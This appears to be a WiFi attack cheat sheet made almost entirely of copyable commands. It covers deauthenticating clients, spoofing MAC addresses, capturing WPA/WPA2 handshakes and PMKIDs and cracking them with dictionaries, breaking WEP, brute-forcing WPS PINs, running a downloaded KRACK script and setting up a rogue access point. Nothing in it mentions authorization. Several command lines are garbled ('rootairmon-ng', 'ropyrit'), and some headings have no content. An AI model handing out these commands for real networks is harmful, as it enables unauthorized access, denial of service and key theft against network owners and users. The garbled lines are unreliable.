Monitoring
Set a wireless network interface to the monitoring mode:
Copy airmon-ng start wlan0
ifconfig wlan0 down && iwconfig wlan0 mode monitor && ifconfig wlan0 up Set a wireless network interface to the monitoring mode on a specified channel:
Copy airmon-ng start wlan0 8
iwconfig wlan0 channel 8 [Optional] Kill services that might interfere with wireless network interfaces in the monitoring mode:
Set a wireless network interface back to the managed mode:
Copy airmon-ng stop wlan0mon
ifconfig wlan0 down && iwconfig wlan0 mode managed && ifconfig wlan0 up Search for WiFi networks within your range:
Copy airodump-ng --wps -w airodump_sweep_results wlan0mon
wash -a -i wlan0mon [Optional] Install reaver/wash on WiFi Pineapple Mark VII:
Copy opkg update && opkg install libpcap reaver [Optional] Install reaver/wash on WiFi Pineapple Nano:
Copy opkg update && opkg install libpcap && opkg -d sd install wash Monitor a WiFi network to capture handshakes/requests:
Copy airodump-ng wlan0mon --channel 8 -w airodump_essid_results --essid essid --bssid FF:FF:FF:FF:FF:FF If you specified the output file, don't forget to stop airodump-ng after you are done monitoring because it will fill up all your free storage space with a large PCAP file.
Use Kismet or WiFi Pineapple to find more information about wireless access points, e.g. their MAC address, vendor's name, etc.
Find Hidden SSIDs
Copy airmon-ng start wlan0
airodump-ng -c <Channel> --bssid <BSSID> wlan0mon
aireplay-ng -0 20 -a <BSSID> -c <VictimMac> wlan0mon Bypass MAC Filtering
Copy airmon-ng start wlan0
airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
aireplay-ng -0 10 --a <BSSID> -c <VictimMac> wlan0mon
ifconfig wlan0mon down
macchanger --mac <VictimMac> wlan0mon
ifconfig wlan0mon up
aireplay-ng -3 -b <BSSID> -h <FakedMac> wlan0mon Cracking
Check if a wireless interface supports packet injection:
Copy aireplay-ng --test wlan1 -e essid -a FF:FF:FF:FF:FF:FF WPA/WPA2 Handshake
Monitor a WiFi network to capture a WPA/WPA2 4-way handshake:
Copy airodump-ng wlan0mon --channel 8 -w airodump_essid_results --essid essid --bssid FF:FF:FF:FF:FF:FF [Optional] Deauthenticate clients from a WiFi network:
Copy aireplay-ng --deauth 10 wlan1 -e essid -a FF:FF:FF:FF:FF:FF Start the dictionary attack against a WPA/WPA2 handshake:
Copy aircrack-ng -e essid -b FF:FF:FF:FF:FF:FF -w rockyou.txt airodump_essid_results*.cap PMKID Attack
Crack the WPA/WPA2 authentication without deauthenticating clients.
Install the required set of tools on Kali Linux:
Copy apt-get update && apt-get -y install hcxtools [Optional] Install the required tool on WiFi Pineapple Mark VII:
Copy opkg update && opkg install hcxdumptool [Optional] Install the required tool on WiFi Pineapple Nano:
Copy opkg update && opkg -d sd install hcxdumptool Start capturing PMKID hashes for all nearby networks:
Copy hcxdumptool --enable_status=1 -o hcxdumptool_results.cap -i wlan0mon [Optional] Start capturing PMKID hashes for specified WiFi networks:
Copy echo HH:HH:HH:HH:HH:HH | sed 's/\://g' >> filter.txt
hcxdumptool --enable_status=1 -o hcxdumptool_results.cap -i wlan0mon --filterlist_ap=filter.txt --filtermode=2 Sometimes it can take hours to capture a single PMKID hash.
Extract PMKID hashes from a PCAP file:
Copy hcxpcaptool hcxdumptool_results.cap -k hashes.txt Start the dictionary attack against PMKID hashes:
Copy hashcat -m 16800 -a 0 --session=cracking --force --status -O -o hashcat_results.txt hashes.txt rockyou.txt Find out more about Hashcat from my other project .
WEP Attacks
Fake Authentication Attack
Copy airmon-ng start wlan0
airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#What’s my mac?
macchanger --show wlan0mon
aireplay-ng -1 0 -a <BSSID> -h <OurMac> -e <ESSID> wlan0mon
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <BSSID> -h <OurMac> wlan0mon
aircrack-ng -b <BSSID> <PCAP_of_FileName> ARP Replay Attack
Copy airmon-ng start wlan0
airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#What’s my mac?
macchanger --show wlan0mon
aireplay-ng -3 -x 1000 -n 1000 -b <BSSID> -h <OurMac> wlan0mon
aircrack-ng -b <BSSID> <PCAP_of_FileName> Chop Chop Attack
Copy airmon-ng start wlan0
airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#What’s my mac?
macchanger --show wlan0mon
aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <OurMac> wlan0mon
aireplay-ng -4 -b <BSSID> -h <OurMac> wlan0mon
#Press ‘y’ ;
packetforge-ng -0 -a <BSSID> -h <OurMac> -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
aireplay-ng -2 -r <FileName2> wlan0mon
aircrack-ng <PCAP_of_FileName> Fragmentation Attack
Copy airmon-ng start wlan0
airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#What’s my mac?
macchanger --show wlan0mon
aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <OurMac> wlan0mon
aireplay-ng -5 -b <BSSID> -h < OurMac > wlan0mon
#Press 'y' ;
packetforge-ng -0 -a <BSSID> -h < OurMac > -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
aireplay-ng -2 -r <FileName2> wlan0mon
aircrack-ng <PCAP_of_FileName> SKA (Shared Key Authentication) Type Cracking
Copy airmon-ng start wlan0
airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
aireplay-ng -0 10 -a <BSSID> -c <VictimMac> wlan0mon
ifconfig wlan0mon down
macchanger --mac <VictimMac> wlan0mon
ifconfig wlan0mon up
aireplay-ng -3 -b <BSSID> -h <FakedMac> wlan0mon
aireplay-ng --deauth 1 -a <BSSID> -h <FakedMac> wlan0mon
aircrack-ng <PCAP_of_FileName> WPA / WPA2 Attacks
WPS Attack
Copy airmon-ng start wlan0
apt-get install reaver
wash -i wlan0mon -C
reaver -i wlan0mon -b <BSSID> -vv -S
#or, Specific attack
reaver -i -c <Channel> -b <BSSID> -p <PinCode> -vv -S
Copy # Crack a WPS PIN:
reaver -vv --pixie-dust -i wlan1 -c 8 -e essid -b FF:FF:FF:FF:FF:FF
# Crack a WPS PIN with some delay between attempts:
reaver -vv --pixie-dust -N -L -d 5 -r 3:15 -T 0.5 -i wlan1 -c 8 -e essid -b FF:FF:FF:FF:FF:FF KRACK Attack
Copy apt-get update apt-get install libnl-3-dev libnl-genl-3-dev pkg-config libssl-dev net-tools git sysfsutils python-scapy python-pycryptodome
git clone https://github.com/NoahhhRyan/krackattacks-test.git
cd krackattacks-test-research cd krackattacks
chmod 777 krack-ft-test.py
chmod 777 disable-hwcrypto.sh
./disable-hwcrypto.sh
python krack-ft-test.py
# Set the network.conf file, in the directory,
# you need to change the “testnet” in it to the wifi name you
# want to attack, the password is arbitrary, and it is saved in
# the suite directory
sudo wpa_supplicant -D nl80211 -i wlan0 -c network.conf Enterprise Attacks
Dictionary Attack
Copy airmon-ng start wlan0
airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon
aircrack-ng -w <WordlistFile> -b <BSSID> <Handshaked_PCAP> crack with Hashcat
Copy airmon-ng
airmon-ng start wlx000f00313c95
airodump-ng wlan1mon -c 11
airodump-ng wlan1mon -c 11 --bssid 48:EE:0C:8E:D0:5C -w /root/hp/
aireplay-ng -0 0 -a 48:EE:0C:8E:D0:5C wlan1mon
# convert pcap to hccapx
https://hashcat.net/cap2hccapx/
apt install hashcat-utils
crunch 8 8 1234567890 | hashcat -m 22000 18081_1596091404.hccapx --status -o cracked.txt Crack with John The Ripper
Copy airmon-ng start wlan0
airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon
cd /pentest/passwords/john
john -wordlist=<Wordlist> --rules -stdout|aircrack-ng -0 -e <ESSID> -w - <PCAP_of_FileName> Crack with coWPAtty
Copy airmon-ng start wlan0
airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon
cowpatty -r <FileName> -f <Wordlist> -2 -s <SSID>
genpmk -s <SSID> -f <Wordlist> -d <HashesFileName>
cowpatty -r <PCAP_of_FileName> -d <HashesFileName> -2 -s <SSID> Crack with Pyrit
Copy rootairmon-ng start wlan0
rooairodump-ng -c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
rootaireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon
ropyrit -r<PCAP_of_FileName> -b <BSSID> -i <Wordlist> attack_passthrough
ropyrit -i <Wordlist> import_passwords
ropyrit -e <ESSID> create_essid
rootpyrit batch
rootpyrit -r <PCAP_of_FileName> attack_db Precomputed WPA Keys Database Attack
Copy airmon-ng start wlan0
airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon
kwrite ESSID.txt
airolib-ng NEW_DB --import essid ESSID.txt
airolib-ng NEW_DB --import passwd <DictionaryFile>
airolib-ng NEW_DB --clean all
airolib-ng NEW_DB --stats
airolib-ng NEW_DB --batch
airolib-ng NEW_DB --verify all
aircrack-ng -r NEW_DB <Handshaked_PCAP> WPA3 Attacks
DragonBlood Attack
Rogue AP
Copy airmon-ng start wlan0
airbase-ng -e “<FakeBSSID>” wlan0mon
brctl addbr <VariableName>
brctl addif <VariableName> wlan0mon
brctl addif <VariableName> at0
ifconfig eth0 0.0.0.0 up
ifconfig at0 0.0.0.0 up
ifconfig <VariableName> up
aireplay-ng -deauth 0 -a <victimBSSID> wlan0mon
dhclient3 <VariableName> &
wireshark &
;select <VariableName> interface Evil Twin
